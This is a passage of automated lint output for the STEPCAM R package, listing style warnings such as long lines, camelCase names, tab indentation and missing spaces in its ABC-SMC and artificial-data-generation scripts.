^\n```\n[R/ABC_SMC.R:176:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:177:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L177) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:178:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L179) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:14:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L193) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L195) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:198:19:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:199:19:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L199) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:19:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L200) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:14:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:18:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:17:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:17:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:17:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:24:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:40:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L209) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:211:24:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:40:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L211) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:212:13:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:27:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:13:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:216:14:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:34:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:21:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L222) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:222:22:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:38:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:242:54:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L242) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:245:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L245) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:9:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:32:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L246) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L249) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:250:20:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:20:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:20:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:61:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L262) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:266:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L266) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"Can't stop at iteration 1 - please set stop_at_iteration to 2 if you only want to generate from the prior\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 